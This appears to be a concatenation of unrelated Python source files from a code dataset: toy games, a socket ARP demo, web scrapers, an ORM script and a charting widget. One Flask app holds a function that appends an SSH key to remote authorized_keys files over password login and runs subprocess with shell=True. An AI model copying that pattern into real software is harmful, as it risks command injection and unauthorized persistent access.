= input(\"Do you want to spin?\")\r\n #if the user's credit is equal to or less than 0 / spin equals anythng other than yes then ...\r\n if user_credit <= 0 or SPIN == \"\":\r\n #SPIN gets a value of no which ends the loop\r\n SPIN = \"no\"\r\n \r\n\r\n\r\n","sub_path":"Fruit Machine Project.py","file_name":"Fruit Machine Project.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"66506548","text":"import socket\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.bind(('127.0.0.1',2220))\ns.listen(1)\nipmac={\"10.1.1.8\":\"44:dd:22:11:33\",\"127.0.0.1\":\"33:aa:fe:4e:2d\",\"10.1.8.5\":\"23:a3:5d:33:9d\"}\n#print ipmac\nclient,address=s.accept()\nstr=client.recv(1024)\nout=ipmac[str]\nclient.send(out)\nstr=client.recv(1024)\nfor k in ipmac.keys():\n\tif ipmac[k]==str:\n\t\tclient.send(k)\ns.close()\n","sub_path":"exp6/arp_server.py","file_name":"arp_server.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177124864","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nimport os.path\nimport paramiko\nimport subprocess\nfrom ConfigParser import SafeConfigParser\nfrom flask import Flask, render_template, redirect, request, url_for, send_from_directory\nfrom werkzeug import secure_filename\n\napp = Flask(__name__)\n\n# set logger level\nlogging.basicConfig(level=logging.DEBUG)\nCONFIG_FILE = \"conf/config\"\n\n# DEFAULTS = {\n# 'debug': 'false',\n# 'host': '0.0.0.0',\n# }\n\n# Parsing config file\nif not os.path.exists(CONFIG_FILE):\n logging.info('Not found configuration file %s' % CONFIG_FILE)\n exit(65)\n\nconfig = SafeConfigParser()\n\n# Load the configuration file\nconfig.read(CONFIG_FILE)\nlogging.info('Reading configuration from %s' % CONFIG_FILE)\n\nserver_host = config.get('server_setting', 'host')\nserver_port = config.getint('server_setting', 'port')\nserver_debug = config.get('server_setting', 'debug')\n# This is the path to the upload directory\nuploaded_dir = config.get('server_setting', 'dir_upload')\n\n\n# These are the extension that we are accepting to be uploaded\n# For a given file, return whether it's an allowed type or not\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in [config.get('server_setting', 'allow_extension')]\n\n\n# Render main page\n@app.route(\"/\")\ndef index():\n return render_template('index.html')\n # return redirect(url_for('login'))\n\n\n# Render login page\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n return render_template('login.html')\n\n\n# Route that will process the file upload\n@app.route('/upload', methods=['POST'])\ndef upload():\n # Get the name of the uploaded file\n file = request.files['file']\n # Check if the file is one of the allowed types/extensions\n if file and allowed_file(file.filename):\n # Make the filename safe, remove unsupported chars\n filename = secure_filename(file.filename)\n # Move the file form the temporal folder to\n # the upload folder we setup\n file.save(os.path.join(uploaded_dir, filename))\n # will basically show on the browser the uploaded file\n return redirect(url_for('uploaded_file', filename=filename))\n else:\n logging.info('Not allowed extensions for file %s' % file.filename)\n return render_template('404.html')\n\n\n# This route is expecting a parameter containing the name\n# of a file. Then it will locate that file on the upload\n# directory and show it on the browser, so if the user uploads\n# an image, that image is going to be show after the upload\n@app.route('/uploads/')\ndef uploaded_file(filename):\n return send_from_directory(uploaded_dir,\n filename)\n\n\ndef calling(*args):\n # return subprocess.Popen(args, stdout=subprocess.PIPE).communicate()[0].rstrip()\n return subprocess.Popen(args, shell=True, stderr=subprocess.PIPE)\n\n\n# cmd = \"/bin/ssh-copy-id\" ' ' + \"-i\" + ' ' + \"pub_key\" + ' ' + result\n\n# result = username + '@' + hostname\n# calling('/bin/ssh-copy-id', '-i', 'pub_key', result)\n\n# deploys key on server\ndef deploy_key(key, server, username, password):\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(server, username=username, password=password)\n # client.exec_command('mkdir -p ~/.ssh/')\n client.exec_command('echo \"%s\" >> ~/.ssh/authorized_keys' % key)\n # client.exec_command('chmod 644 ~/.ssh/authorized_keys')\n # client.exec_command('chmod 700 ~/.ssh/')\n\n\n# key = open(os.path.dirname).read()\n# print(key)\n# username = os.getlogin()\n# password = getpass()\n# hosts = [\"hostname1\", \"hostname2\", \"hostname3\"]\n# for host in hosts:\n# deploy_key(key, host, username, password)\n\nif __name__ == \"__main__\":\n app.run(\n host=server_host,\n port=server_port,\n debug=server_debug\n )\n","sub_path":"web-app.py","file_name":"web-app.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"201591834","text":"# coding=utf-8\nimport urllib\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nimport random\nimport time\nimport os\n\nuser_agent_list = [\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 \"\n \"(KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\",\n \"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 \"\n \"(KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 \"\n \"(KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 \"\n \"(KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 \"\n \"(KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 \"\n \"(KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 \"\n \"(KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 \"\n \"(KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 \"\n \"(KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 \"\n \"(KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\"\n]\n\ndef parser_apks(count=300):\n _root_url = \"https://www.apkmirror.com\" # 应用市场主页网址\n res_parser = {}\n # 设置爬取的页面,从第一页开始爬取,第一页爬完爬取第二页,以此类推\n page_num = 12\n while count:\n # 获取应用列表页面\n print(\"count=\" + str(count))\n wbdata = requests.get(\"https://www.apkmirror.com/page/\" + str(page_num)+ '/').text\n print(\"starting at page {}\".format(page_num))\n # 解析应用列表页面内容\n soup = BeautifulSoup(wbdata, \"html.parser\")\n links = soup.find_all(\"a\", class_=\"downloadLink\", alt=\"\")\n\n if len(links) == 0:\n print(\"==============links空了=================\")\n break\n\n for link in links:\n # 获取应用详情页面的链接\n opener = urllib.request.build_opener()\n # opener.addheaders = [('User-Agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30')]\n opener.addheaders = [('User-Agent', random.choice(user_agent_list))]\n urllib.request.install_opener(opener)\n detail_link = urllib.parse.urljoin(_root_url, str(link[\"href\"]))\n download_page = requests.get(detail_link).text\n time.sleep(2)\n # 解析应用详情页面\n soup1 = BeautifulSoup(download_page, \"html.parser\")\n play_link = soup1.find('a', title=\"View on Play Store\")\n if not play_link:\n continue\n play_link = play_link['href']\n package_name = play_link.split(\"=\")[1]\n # if not download_link or download_link == \"\":\n # soup2 = BeautifulSoup(download_page, \"html.parser\")\n # version_link = soup2.find(\"a\",style=re.compile(\"^color\"),href=re.compile(\"^/apk\"))\n # if version_link:\n # # 获取应用详情页面的链接\n # detail_link = urllib.parse.urljoin(_root_url, str(version_link[\"href\"]))\n # download_page = requests.get(detail_link).text\n # # 解析应用详情页面\n # soup3 = BeautifulSoup(download_page, \"html.parser\")\n # download_link = soup1.find(class_=\"btn btn-flat downloadButton\")\n # if not download_link:\n # continue\n # download_link = download_link[\"href\"]\n # # 获取直接下载的链接\n # download_url = urllib.parse.urljoin(_root_url, str(download_link))\n # 解析后会有重复的结果,通过判断去重\n if package_name not in res_parser.keys():\n if count > 0:\n res_parser[package_name] = play_link\n count = count - 1\n else:\n break\n if count == 0:\n break\n if count > 0:\n page_num = page_num + 1\n\n print(\"爬取apk数量为: \" + str(len(res_parser)))\n return res_parser\n\n\ndef craw_apks(count=300,save_path=os.path.join(os.pardir,\"apk\")):\n print(\"craw_apks count=\" + str(count))\n res_dic = parser_apks(count)\n res = []\n for key in res_dic.keys():\n res.append(res_dic[key])\n print(res)\n\nif __name__ == \"__main__\":\n category = 27\n # while category<=10:\n craw_apks(150)\n\n\n","sub_path":"droidbot-master/scripts/crawlApkMirror.py","file_name":"crawlApkMirror.py","file_ext":"py","file_size_in_byte":5814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"502541341","text":"\"\"\"\nVersion:0.3\n功能:读取指定文件,并输出由正则表达式所匹配出的文本。可以对文本进行调整。如果无需调整的话,就将调整的语句注释掉即可。\n已知兼容性:win10_1709_16299.371 X64/Python 3.6.5 32bit\n已知问题:目前之前对最外层的json数据进行解析。\n\n背景:\n有时候在对比两份报文差异的时候,由于json键值对儿的值在对比的时候往往不一样,所以将键提取出来,然后用VS Code来对比。就方便一些。\n\"\"\"\nimport json\n\ndef get_json_key(json_Data):\n json_dict = json.loads(json_Data)\n for x in json_dict.keys():\n print(x)","sub_path":"tools/util/get_json_key.py","file_name":"get_json_key.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"590301609","text":"from abc import ABCMeta, abstractmethod\n\n\nclass AbstractSocialClass(metaclass=ABCMeta):\n \"\"\"Abstract base class for social class.\"\"\"\n\n def __init__(self):\n self.name = \"\"\n self.rank = -1\n\n\nclass UpperClass(AbstractSocialClass):\n \"\"\"Rich people.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.name = \"Upper class\"\n self.rank = 3\n\n\nclass MiddleClass(AbstractSocialClass):\n \"\"\"Average / Working class.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.name = \"Middle class\"\n self.rank = 2\n\n\nclass LowerClass(AbstractSocialClass):\n \"\"\"Poor people.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.name = \"Lower class\"\n self.rank = 1\n\n","sub_path":"src/social_class.py","file_name":"social_class.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"239115513","text":"import time, socket, urllib2, datetime\n\ndef getfoods(campus, day, restaurant):\n if (restaurant==0): restaurant=10\n elif (restaurant==1): restaurant=11\n day = day + 1\n parsedfoods=[]\n\n if (day>5):\n parsedfoods.append(\"Weekend.\")\n return parsedfoods\n try:\n url = \"http://www.unicafe.fi/lounas/?kampus=\" + str(campus) + \"&ravintola=\" + str(restaurant) + \"&paiva=\" + str(day)\n unicafe = urllib2.urlopen(url)\n source = unicafe.read()\n foods = source.split('
  • ')[1].split('')[0]\n foods = foods.split('
  • ')\n\n for food in foods:\n food = food.split('')[1].split('<')[0].split(' ')[0]\n parsedfoods.append(food + \" - \" + type)\n\n return parsedfoods\n except:\n parsedfoods.append(\"Either no food available or an error occured.\")\n return parsedfoods\n\ndef unicafe():\n\tday = time.localtime(time.time())[6]\n\thour = time.localtime(time.time())[3]\n\tover17=0\n\tif (hour>17):\n\t\tday=day+1\n\t\tover17=1\n\tdt=datetime.datetime.now()\n\tcurday=dt.day+over17\n\tif(curday==32): curday=1\n\tret=\"Food for: \" + str(curday) + \".\" + str(dt.month) + \".\" + str(dt.year) + \"\\n*----*\\n\"\n\tret+=\"Chemicum:\\n\"\n\ttry:\n\t\tparsedfoods = getfoods(3,day,0)\n\t\tfor food in parsedfoods:\n\t\t\tret+=food\n\t\t\tret+=\"\\n\"\n\texcept:\n\t\tret+=\"Either no food available or an error occured.\"\n\t\tret+=\"\\n\"\n\tret+=\"*----*\\n\"\n\tret+=\"Exactum:\\n\"\n\ttry:\n\t\tparsedfoods = getfoods(3,day,1)\n\t\tfor food in parsedfoods:\n\t\t\tret+=food\n\t\t\tret+=\"\\n\"\n\texcept:\n\t\tret+=\"Either no food available or an error occured.\"\n\t\tret+=\"\\n\"\n\n\treturn ret\n\ndef unicafe_centre():\n\tday = time.localtime(time.time())[6]\n\thour = time.localtime(time.time())[3]\n\tover17=0\n\tif (hour>17):\n\t\tday=day+1\n\t\tover17=1\n\tdt=datetime.datetime.now()\n\tcurday=dt.day+over17\n\tif(curday==32): curday=1\n\tret=\"Food for: \" + str(curday) + \".\" + str(dt.month) + \".\" + str(dt.year) + \"\\n*----*\\n\"\n\tret+=\"Ylioppilasaukio:\\n\"\n\ttry:\n\t\tparsedfoods = getfoods(1,day,8)\n\t\tfor food in parsedfoods:\n\t\t\tret+=food\n\t\t\tret+=\"\\n\"\n\texcept:\n\t\tret+=\"Either no food available or an error occured.\"\n\t\tret+=\"\\n\"\n\tret+=\"*----*\\n\"\n\tret+=\"Porthania:\\n\"\n\ttry:\n\t\tparsedfoods = getfoods(1,day,3)\n\t\tfor food in parsedfoods:\n\t\t\tret+=food\n\t\t\tret+=\"\\n\"\n\texcept:\n\t\tret+=\"Either no food available or an error occured.\"\n\t\tret+=\"\\n\"\n\n\treturn ret\n","sub_path":"unicafe.py","file_name":"unicafe.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"43046348","text":"from dao.orm.model import *\nfrom dao.db import OracleDb\n\ndb = OracleDb()\n\nBase.metadata.create_all(db.sqlalchemy_engine)\n\nsession = db.sqlalchemy_session\n\n# clear all tables in right order\nsession.query(ormUserAttendedEvent).delete()\nsession.query(ormEvent).delete()\nsession.query(ormUser).delete()\n\n\nsession.add_all([\n ormUser(user_name='johnsmith', user_email='john@gmail.com', user_first_name='John', user_last_name='Smith'),\n ormUser(user_name='topsy', user_email='top@gmail.com', user_first_name='Topsy', user_last_name='Daiver'),\n ormUser(user_name='clark', user_email='kent@gmail.com', user_first_name='Clark', user_last_name='Kent'),\n ormUser(user_name='Ann', user_email='ann@gmail.com', user_first_name='Ann', user_last_name='Smith'),\n ormEvent(event_name='Atlas', event_date='10-OCT-2018', ),\n ormEvent(event_name='Zahid', event_date='10-SEP-2010', ),\n ormEvent(event_name='Sziget', event_date='10-FEB-2010', ),\n])\n\nevent = session.query(ormEvent).first()\nevent.orm_users.append(session.query(ormUser).first())\n\nsession.commit()\n","sub_path":"km-63/Мілевська/source/dao/orm/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"283683032","text":"import pygame\nimport sys\n\nnow_angle = 0\nset_angle = 0\n\nRIGHT_X = 45\n\nLEFT_X = -45\n\nset_x = 0\n\nnow_x = 0\nnow_y = 0\n\nWIDTH = 200\nHEIGHT = 200\n\npygame.init()\nwindow = pygame.display.set_mode((WIDTH + 100, HEIGHT))\npygame.display.set_caption(\"Cessna 172\")\n\n\n\nCOLOR_INACTIVE = pygame.Color('lightskyblue3')\nCOLOR_ACTIVE = pygame.Color('dodgerblue2')\nFONT = pygame.font.Font(None, 32)\n\n\nclass InputBox:\n\n def __init__(self, x, y, w, h, text=''):\n self.rect = pygame.Rect(x, y, w, h)\n self.color = COLOR_INACTIVE\n self.text = text\n self.txt_surface = FONT.render(text, True, self.color)\n self.INPUT = 0\n self.active = False\n\n def handle_event(self, event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n if self.rect.collidepoint(event.pos):\n self.active = not self.active\n else:\n self.active = False\n self.color = COLOR_ACTIVE if self.active else COLOR_INACTIVE\n if event.type == pygame.KEYDOWN:\n if self.active:\n if event.key == pygame.K_RETURN:\n \n # Update INPUT\n self.INPUT = self.text\n\n self.text = ''\n elif event.key == pygame.K_BACKSPACE:\n self.text = self.text[:-1]\n else:\n self.text += event.unicode\n # Re-render the text.\n self.txt_surface = FONT.render(self.text, True, self.color)\n\n def update(self):\n width = max(35, self.txt_surface.get_width() + 10)\n self.rect.w = width\n\n def draw(self, screen):\n screen.blit(self.txt_surface, (self.rect.x + 5, self.rect.y + 5))\n pygame.draw.rect(screen, self.color, self.rect, 2)\n\n\n\n\n\npp = pygame.image.load(\"ninfly.png\")\nppRect = pp.get_rect()\nppRect = ppRect.move((WIDTH - ppRect.width) / 2, (HEIGHT - ppRect.height) / 2)\npygame.display.update()\n\ninput_box = InputBox(220, 90, 32, 32)\n\nflag = True\nwhile flag:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n input_box.handle_event(event)\n\n if now_angle > set_angle:\n now_angle -= 0.5\n if now_angle < set_angle:\n now_angle = set_angle\n if now_angle < set_angle:\n now_angle += 0.5\n if now_angle > set_angle:\n now_angle = set_angle\n \n newpp = pygame.transform.rotate(pp, now_angle)\n\n newRect = newpp.get_rect(center = ppRect.center)\n\n\n if input_box.INPUT == 'L' :\n set_angle = 20\n set_x = RIGHT_X\n elif input_box.INPUT == 'R':\n set_angle = -20\n set_x = LEFT_X\n elif input_box.INPUT != '' :\n set_angle = 0\n set_x = 0\n\n if set_x > now_x:\n now_x += 0.9 * 1.2\n if now_x > set_x:\n now_x = set_x\n elif set_x < now_x:\n now_x -= 0.9 * 1.2\n if now_x < set_x:\n now_x = set_x\n\n if now_x > 0:\n now_y = -now_x / 9.0\n else:\n now_y = now_x / 9.0\n \n\n window.fill((111,111,111))\t\n img = pygame.image.load(\"nin.png\")\n mou = pygame.image.load(\"ninmou.png\")\n window.blit(img, (0, 0))\n window.blit(newpp, newRect)\n window.blit(mou, (now_x, now_y))\n\n \n input_box.update()\n input_box.draw(window)\n \n pygame.display.flip()\n pygame.display.update()\n","sub_path":"shift.py","file_name":"shift.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346881631","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nfrom collections import deque\nfrom datetime import datetime\n# 其他\nfrom functools import partial\n\nfrom qtpy import QtWidgets, QtGui, QtCore\nfrom qtpy.QtCore import *\n# Qt相关和十字光标\nfrom qtpy.QtGui import *\nfrom qtpy.QtWidgets import QApplication\n\nfrom uiCrosshair import Crosshair\nfrom vnpy.trader.IndicatorsFun.indicatorsManage import IndicatorsFunManage\nfrom vnpy.trader.IndicatorsFun.algo.vtIndictors import VtIndicatorsData\n\nfrom vnpy.trader.widget.IndicatorsCustomMenu import CustomMenu\nimport pyqtgraph as pg\n\n# 字符串转换\n# ---------------------------------------------------------------------------------------\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\n\n########################################################################\n# 键盘鼠标功能\n########################################################################\nclass KeyWraper(QtWidgets.QWidget):\n \"\"\"键盘鼠标功能支持的元类\"\"\"\n\n # 初始化\n # ----------------------------------------------------------------------\n def __init__(self, parent=None):\n QtWidgets.QWidget.__init__(self, parent)\n\n # 重载方法keyPressEvent(self,event),即按键按下事件方法\n # ----------------------------------------------------------------------\n def keyPressEvent(self, event):\n if event.key() == QtCore.Qt.Key_Up:\n self.onUp()\n elif event.key() == QtCore.Qt.Key_Down:\n self.onDown()\n elif event.key() == QtCore.Qt.Key_Left:\n self.onLeft()\n elif event.key() == QtCore.Qt.Key_Right:\n self.onRight()\n elif event.key() == QtCore.Qt.Key_PageUp:\n self.onPre()\n elif event.key() == QtCore.Qt.Key_PageDown:\n self.onNxt()\n\n # 重载方法mousePressEvent(self,event),即鼠标点击事件方法\n # ----------------------------------------------------------------------\n def mousePressEvent(self, event):\n\n if event.button() == QtCore.Qt.RightButton:\n self.onRClick(event.pos())\n elif event.button() == QtCore.Qt.LeftButton:\n self.onLClick(event.pos())\n\n # 重载方法mouseReleaseEvent(self,event),即鼠标点击事件方法\n # ----------------------------------------------------------------------\n def mouseReleaseEvent(self, event):\n\n if event.button() == QtCore.Qt.RightButton:\n self.onRRelease(event.pos())\n elif event.button() == QtCore.Qt.LeftButton:\n self.onLRelease(event.pos())\n self.releaseMouse()\n\n # 重载方法wheelEvent(self,event),即滚轮事件方法\n # ----------------------------------------------------------------------\n def wheelEvent(self, event):\n\n if event.delta() > 0:\n self.onUp()\n else:\n self.onDown()\n\n # 重载方法dragMoveEvent(self,event),即拖动事件方法\n # ----------------------------------------------------------------------\n def paintEvent(self, event):\n self.onPaint()\n\n # PgDown键\n # ----------------------------------------------------------------------\n def onNxt(self):\n pass\n\n # PgUp键\n # ----------------------------------------------------------------------\n def onPre(self):\n pass\n\n # 向上键和滚轮向上\n # ----------------------------------------------------------------------\n def onUp(self):\n pass\n\n # 向下键和滚轮向下\n # ----------------------------------------------------------------------\n def onDown(self):\n pass\n\n # 向左键\n # ----------------------------------------------------------------------\n def onLeft(self):\n pass\n\n # 向右键\n # ----------------------------------------------------------------------\n def onRight(self):\n pass\n\n # 鼠标左单击\n # ----------------------------------------------------------------------\n def onLClick(self, pos):\n pass\n\n # 鼠标右单击\n # ----------------------------------------------------------------------\n def onRClick(self, pos):\n pass\n\n # 鼠标左释放\n # ----------------------------------------------------------------------\n def onLRelease(self, pos):\n pass\n\n # 鼠标右释放\n # ----------------------------------------------------------------------\n def onRRelease(self, pos):\n pass\n\n # 画图\n # ----------------------------------------------------------------------\n def onPaint(self):\n pass\n\n\n########################################################################\n# 选择缩放功能支持\n########################################################################\nclass CustomViewBox(pg.ViewBox):\n # ----------------------------------------------------------------------\n def __init__(self, parent, *args, **kwds):\n pg.ViewBox.__init__(self, *args, **kwds)\n self.parent = parent\n # 拖动放大模式\n # self.setMouseMode(self.RectMode)\n\n ## 右键自适应\n # ----------------------------------------------------------------------\n def mouseClickEvent(self, ev):\n\n if ev.button() == QtCore.Qt.RightButton:\n self.contextMenuEvent(ev) # 右键菜单\n # if ev.button()==QtCore.Qt.LeftButton:\n # self.autoRange()\n # 重载方法mousePressEvent(self,event),即鼠标点击事件方法\n # ----------------------------------------------------------------------\n def mousePressEvent(self, event):\n\n pg.ViewBox.mousePressEvent(self, event)\n\n # 重载方法mouseDragEvent(self,event),即拖动事件方法\n def mouseDragEvent(self, ev, axis=None):\n # if ev.start==True and ev.finish==False: ##判断拖拽事件是否结束\n pos = ev.pos()\n lastPos = ev.lastPos()\n dif = pos - lastPos\n\n rect = self.sceneBoundingRect()\n\n pianyi = dif.x() * self.parent.countK * 2 / rect.width()\n\n self.parent.index -= int(pianyi)\n self.parent.index = max(self.parent.index, 60)\n xMax = self.parent.index + self.parent.countK ##\n xMin = self.parent.index - self.parent.countK\n if xMin < 0:\n xMin = 0\n\n # self.parent.plotAll(False, xMin, xMax) #注释原因:拖动事件不需要先绘���图形界面\n\n pg.ViewBox.mouseDragEvent(self, ev, axis)\n # ## 重载方法resizeEvent(self, ev)\n\n def resizeEvent(self, ev):\n self.linkedXChanged()\n self.linkedYChanged()\n self.updateAutoRange()\n self.updateViewRange()\n self._matrixNeedsUpdate = True\n self.sigStateChanged.emit(self)\n self.background.setRect(self.rect())\n self.sigResized.emit(self)\n self.parent.refreshHeight()\n ###加载指标\n def contextMenuEvent(self,ev):\n \"\"\"打开指标窗口\"\"\"\n CustomMenu(self.parent)\n\n########################################################################\n# 时间序列,横坐标支持\n########################################################################\nclass MyStringAxis(pg.AxisItem):\n \"\"\"时间序列横坐标支持\"\"\"\n\n # 初始化\n # ----------------------------------------------------------------------\n def __init__(self, xdict, *args, **kwargs):\n pg.AxisItem.__init__(self, *args, **kwargs)\n self.minVal = 0\n self.maxVal = 0\n self.xdict = xdict\n self.x_values = np.asarray(xdict.keys())\n self.x_strings = xdict.values()\n self.setPen(color=(255, 255, 255, 255), width=0.8)\n self.setStyle(tickFont=QFont(\"Roman times\", 10, QFont.Bold), autoExpandTextSpace=True)\n\n # 更新坐标映射表\n # ----------------------------------------------------------------------\n def update_xdict(self, xdict):\n self.xdict.update(xdict)\n self.x_values = np.asarray(self.xdict.keys())\n self.x_strings = self.xdict.values()\n\n # 将原始横坐标转换为时间字符串,第一个坐标包含日期\n # ----------------------------------------------------------------------\n def tickStrings(self, values, scale, spacing):\n strings = []\n for v in values:\n vs = v * scale\n if vs in self.x_values:\n vstr = self.x_strings[np.abs(self.x_values - vs).argmin()]\n if (isinstance(vstr, (str))):\n vstr = vstr\n else:\n vstr = vstr.strftime('%Y-%m-%d %H:%M:%S')\n else:\n vstr = \"\"\n strings.append(vstr)\n return strings\n\n\n########################################################################\n# K线图形对象\n########################################################################\nclass CandlestickItem(pg.GraphicsObject):\n \"\"\"K线图形对象\"\"\"\n\n # 初始化\n # ----------------------------------------------------------------------\n def __init__(self, data):\n\n \"\"\"初始化\"\"\"\n pg.GraphicsObject.__init__(self)\n\n # 数据格式: [ (time, open, close, low, high),...]\n self.data = data\n # 只重画部分图形,大大提高界面更新速度\n self.setFlag(self.ItemUsesExtendedStyleOption)\n # 画笔和画刷\n w = 0.4\n self.offset = 0\n self.low = 0\n self.high = 1\n self.picture = QtGui.QPicture()\n self.pictures = []\n self.bPen = pg.mkPen(color=(0, 240, 240, 255), width=w * 2)\n self.bBrush = pg.mkBrush((0, 240, 240, 255))\n self.rPen = pg.mkPen(color=(255, 60, 60, 255), width=w * 2)\n self.rBrush = pg.mkBrush((255, 60, 60, 255))\n self.rBrush.setStyle(Qt.NoBrush)\n # 刷新K线\n self.generatePicture(self.data)\n\n # 画K线\n # ----------------------------------------------------------------------\n def generatePicture(self, data=None, redraw=False):\n \"\"\"重新生成图形对象\"\"\"\n # 重画或者只更新最后一个K线\n if redraw:\n self.pictures = []\n elif self.pictures:\n self.pictures.pop()\n w = 0.4\n bPen = self.bPen\n bBrush = self.bBrush\n rPen = self.rPen\n rBrush = self.rBrush\n low, high = (data[0]['low'], data[0]['high']) if len(data) > 0 else (0, 1)\n for (t, open0, close0, low0, high0) in data:\n if t >= len(self.pictures):\n\n tShift = t\n\n low, high = (min(low, low0), max(high, high0))\n picture = QtGui.QPicture()\n p = QtGui.QPainter(picture)\n # # 下跌蓝色(实心), 上涨红色(空心)\n pen, brush, pmin, pmax = (bPen, bBrush, close0, open0) \\\n if open0 > close0 else (rPen, rBrush, open0, close0)\n p.setPen(pen)\n p.setBrush(brush)\n # 画K线方块和上下影线\n if pmin > low0:\n p.drawLine(QtCore.QPointF(tShift, low0), QtCore.QPointF(tShift, pmin))\n if high0 > pmax:\n p.drawLine(QtCore.QPointF(tShift, pmax), QtCore.QPointF(tShift, high0))\n p.drawRect(QtCore.QRectF(tShift - w, open0, w * 2, close0 - open0))\n # if open0 == close0:\n # p.drawRect(QtCore.QPointF(tShift - w, open0), QtCore.QPointF(tShift + w, close0))\n # else:\n # p.drawRect(QtCore.QRectF(tShift - w, open0, w * 2, close0 - open0))\n # if pmin > low0:\n # p.drawLine(QtCore.QPointF(tShift, low0), QtCore.QPointF(tShift, pmin))\n # if high0 > pmax:\n # p.drawLine(QtCore.QPointF(tShift, pmax), QtCore.QPointF(tShift, high0))\n p.end()\n\n self.pictures.append(picture)\n self.low, self.high = low, high\n\n # 手动重画\n # ----------------------------------------------------------------------\n def update(self):\n if not self.scene() is None:\n self.scene().update()\n\n # 自动重画\n # ----------------------------------------------------------------------\n def paint(self, p, o, w):\n rect = o.exposedRect\n xmin, xmax = (max(0, int(rect.left())), min(len(self.pictures), int(rect.right())))\n\n [p.drawPicture(0, 0, pic) for pic in self.pictures[xmin:xmax]]\n\n # 定义边界\n # ----------------------------------------------------------------------\n def boundingRect(self):\n return QtCore.QRectF(0, self.low, len(self.pictures), (self.high - self.low))\n\n\n########################################################################\nclass KLineWidget(KeyWraper):\n \"\"\"用于显示价格走势图\"\"\"\n\n listBar = []\n listVol = []\n listClose=[]\n listOpen=[]\n listHigh = []\n listLow = []\n listSig = []\n listOpenInterest = []\n arrows = []\n\n # 